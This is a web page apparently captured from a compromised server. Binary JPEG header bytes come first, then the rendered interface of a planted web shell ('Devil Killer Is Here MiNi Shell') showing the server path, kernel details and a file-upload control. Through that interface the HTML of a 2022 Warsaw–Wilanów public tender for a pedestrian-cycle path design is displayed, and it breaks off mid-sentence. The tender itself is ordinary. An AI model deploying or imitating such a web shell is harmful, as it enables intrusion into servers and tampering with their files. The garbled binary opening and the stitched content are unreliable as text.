JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220913/0034581201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie kompleksowej dokumentacji projektowo–wykonawczej budowy ciągu pieszo-rowerowego wzdłuż ul. Z. Vogla. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie kompleksowej dokumentacji projektowo–wykonawczej budowy ciągu pieszo-rowerowego wzdłuż ul. Z. Vogla. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d28ee8cc-3329-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00345812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00044863/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.20 Opracowanie dokumentacji projektowej budowy ciągu pieszo-rowerowego na ul. Vogla na odcinku od ul. Przyczółkowej do ul. Europejskiej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo<br/>aplikacyjne do przekazania danych dotyczące systemu https://zamowienia.um.warszawa.pl:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MS Edge;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf<br/>Format kodowania i oznaczania czasu:<br/>• plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert;<br/>• oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem<br/>Głównego Urzędu Miar.<br/>Wymagania sprzętowo-aplikacyjne w zakresie podpisywania ofert:<br/>W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego. Prawidłowość<br/>zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu<br/>przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów podpisem<br/>osobistym), wykonawca musi posiadać:<br/>• E-dowód osobisty osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie<br/>https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace,<br/>po kliknięciu przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym),<br/>wykonawca musi posiadać:<br/>• Profil zaufany osoby składającej ofertę w Systemie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż: - Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1, ze zm. 3) ),zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, do upływu terminu do<br/>ich wniesienia.- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.- W<br/>postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">43/WIR/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 162601,63 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A.	Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowo-wykonawczej budowy ciągu pieszo-rowerowego na ul. Vogla na odcinku od ul. Przyczółkowej do <br/>ul. Europejskiej. Inwestycja realizowana będzie w trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.<br/>Opis przedmiotu zamówienia stanowi Załącznik nr 5 do SWZ. <br/><br/>PODSTAWA WYKONANIA ZAMÓWIENIA:<br/><br/>•	zatwierdzony projekt stałej organizacji ruchu „Budowy skrzyżowania ul. Przyczółkowej <br/>z ul. A. Branickiego i ul. Z. Vogla na terenie Dzielnicy Wilanów m.st. Warszawy wraz <br/>z włączeniem ul. Z. Vogla i ul. A. Branickiego”, <br/>•	ogólne założenia miejscowego planu zagospodarowania przestrzennego dla przedmiotowego rejonu.<br/><br/><br/>ZAKRES OPRACOWANIA:<br/><br/>I część Dokumentacji obejmująca:<br/><br/>1.	Koncepcję drogową wraz z wielobranżową analizą układu komunikacyjnego - dla odcinka drogi ok 380 m<br/><br/>II część Dokumentacji obejmująca:<br/><br/> 1. Mapę w skali co najmniej 1:5000 przedstawiająca proponowany przebieg drogi, <br/> z zaznaczeniem terenu niezbędnego dla obiektów budowlanych, oraz istniejące<br/> uzbrojenie terenu.<br/>2.	Analizę powiązania drogi z innymi drogami publicznymi,<br/>3.	Określenie zmian w dotychczasowej infrastrukturze,<br/>4.	Projekt budowlany zagospodarowania terenu z naniesionymi granicami nieruchomości,<br/>5.	Projekt budowlany drogowy,<br/>6.	Projekt budowlany odwodnienia ,<br/>7.	Projekt budowlany przebudowy sieci uzbrojenia terenu (według potrzeby),<br/>8.	Informacja BIOZ,<br/>9.	Mapy z projektem podziału nieruchomości,<br/>10.	Badania geotechniczne,<br/>11.	Projekty wykonawcze: drogowy, odwodnienia, przebudowy sieci uzbrojenia terenu, <br/>12.	Projekt stałej organizacji ruchu,<br/>13.	Kosztorys inwestorski,<br/>14.	Przedmiar robót do celów przetargowych zgodny z STWiOR,<br/>15.	Specyfikacja techniczna wykonania i odbioru robót.<br/><br/>Wykonawca zobowiązany jest wykonać następującą dokumentację: <br/> a) mapę w skali co najmniej 1:5000 przedstawiająca proponowany przebieg drogi z zaznaczeniem<br/> terenu niezbędnego dla obiektów budowlanych, oraz istniejące uzbrojenie terenu - 2 egz.<br/> b) analizę powiązania drogi z innymi drogami publicznymi - 2 egz.<br/> c) określenie zmian w dotychczasowej infrastrukturze – 2 egz.<br/> d) koncepcję drogową wraz z analizą układu komunikacyjnego – 2 egz.<br/>•	projekty budowlane w 5 egz. (dodatkowo 3 egz. z kopiami ww. projektów z pieczęciami Urzędu),<br/>•	projekty wykonawcze w 5 egz. <br/>•	kosztorys inwestorski w 2 egz. <br/>•	przedmiar robót do celów przetargowych zgodny z STWiOR w 2 egz.<br/>•	specyfikację techniczną wykonania i odbioru robót w 5 egz.<br/>•	projekt organizacji ruchu w 5 egz.<br/>•	mapy z projektem podziału nieruchomości - 6 egz.<br/><br/>Powyższe opracowania należy załączyć również zapisane na płycie CD/pendrive.<br/>Przedmiary robót i kosztorysy inwestorskie należy wykonać na bazie programów <br/>do kosztorysowania NORMA lub kompatybilnymi z nimi. Opracowania tekstowe <br/>do dokumentacji projektowej należy sporządzić w programie z pakietu MS OFFICE, rysunki w programie AutoCAD lub kompatybilnym.<br/>Wnioski o wydanie opinii, o których mowa w art. 11 b.1, art. 11 d. 1 pkt 8 ustawy z dnia 10 kwietnia 2003 o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, oraz o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej w trybie ww. ustawy składa Prezydent m. st. Warszawy reprezentowany przez Burmistrza Dzielnicy Wilanów. <br/><br/><br/>Dodatkowe wymagania wobec Wykonawcy bez ponoszenia dodatkowych kosztów przez Zamawiającego:<br/>•	uzyskanie wszelkich niezbędnych uzgodnień i opinii (m. in. ZDM, MPWiK S.A. i/lub inny właściwy, w gestii którego są sieci wod-kan, w tym odnośnie kanalizacji deszczowej, Stoen Operator, Orange, Biura Zarzadzania Ruchem Drogowym, BAIPP-WKPP, uzgodnienia z Narady Koordynacyjnej Urzędu m.st. Warszawy w zakresie usytuowania sieci uzbrojenia terenu, itd.) według potrzeb i w zakresie zgodnym z obowiązującymi przepisami,<br/>•	na życzenie Zamawiającego dokonanie uaktualnienia kosztorysów inwestorskich w okresie dwóch lat od daty wykonania przedmiotu zamówienia,<br/>•	pisemne oświadczenie o zgodności wykonanych opracowań projektowych <br/>z obowiązującymi przepisami prawa, zasadami wiedzy technicznej i normami oraz ich kompletności z punktu widzenia celu, jakiemu mają służyć i jednolitości pod względem zapisów: wersji elektronicznej i papierowej, <br/>•	zapewnienie sprawdzenia wykonanego dzieła przez osobę/y posiadające uprawnienia projektowe,<br/>•	na każde wezwanie właściwych w sprawie organów administracji, Wykonawca zobowiązany będzie do uzupełnienia, poprawienia lub zmiany opracowanego wniosku i załączników do niego.<br/>•	przewiduje się płatności częściowe: <br/>- w wysokości 10% po przekazaniu Zamawiającemu i zaakceptowaniu przez niego I części<br/> Dokumentacji;<br/>- w wysokości 80% po przekazaniu Zamawiającemu i zaakceptowaniu przez niego II części<br/> Dokumentacji;<br/>- w wysokości 10% po uzyskaniu przez Zamawiającego ostatecznej decyzji o zezwoleniu na<br/> realizację inwestycji drogowej (o czym Zamawiający powiadomi Wykonawcę w terminie 7 dni od otrzymania przedmiotowej decyzji); </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby realizującej zamówienie – projektanta drogowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące<br/>zdolności technicznej lub zawodowej.<br/>1.1. W zakresie doświadczenia Wykonawcy<br/>Na potwierdzenie spełnienia warunku udziału Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie przynajmniej 1<br/>usługę o wartości wynoszącej co najmniej 80.000,00 zł brutto (słownie: osiemdziesiąt tysięcy zł 00/100), polegającą na<br/>wykonaniu dokumentacji projektowej budowy lub rozbudowy drogi publicznej w trybie ustawy z dnia 10 kwietnia 2003 r. o<br/>szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.<br/>W przypadku gdy wartość zrealizowanego zamówienia wyrażona została w umowie w walucie obcej – wówczas wartość<br/>tego zamówienia ustala się jako równowartość tej kwoty w zł przeliczona wg średniego kursu NBP z dnia opublikowania<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>1.2 W zakresie kwalifikacji osób skierowanych do realizacji zamówienia<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, iż w trakcie realizacji zamówienia dysponować<br/>będą, na potrzeby prawidłowej realizacji, przynajmniej:<br/>a. jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, która pełnić<br/>będzie funkcję projektanta drogowego, ponadto wskazana osoba powinna posiadać doświadczenie zawodowe zdobyte jako<br/>projektant drogowy przy wykonaniu co najmniej jednej dokumentacji projektowej budowy lub rozbudowy drogi publicznej w<br/>trybie ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg<br/>publicznych.<br/>Dla celów weryfikacji kwalifikacji osób, przez „wykonaną dokumentację projektową” należy rozumieć odebraną przez<br/>zamawiającego protokołem końcowym dokumentację projektową.<br/>Przez „projektanta drogowego” należy rozumieć pełnienie funkcji projektanta w myśl art. 20 ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane (tj. Dz.U. z 2021 r. poz. 2351).<br/>Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dnia 7<br/>lipca 1994 r. – Prawo budowlane (tj. Dz.U. z 2021 r. poz. 2351), rozumie przez to również odpowiadające im ważne<br/>uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa.<br/>W przypadku dysponowania osobami będącymi obywatelami państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej oraz państwa członkowskiego Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o<br/>Europejskim Obszarze Gospodarczym, kwestie uprawnień należy rozpatrywać z uwzględnieniem art. 12a ustawy z dnia 7<br/>lipca 1994 r. – Prawo budowlane oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów,<br/>inżynierów budownictwa oraz urbanistów (Dz.U.2019 poz. 1117 ze zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U 2021 poz. 1646 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzenie aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w III.C.1.2)a) SWZ w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego - wg wzoru stanowiącego Załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane,<br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie 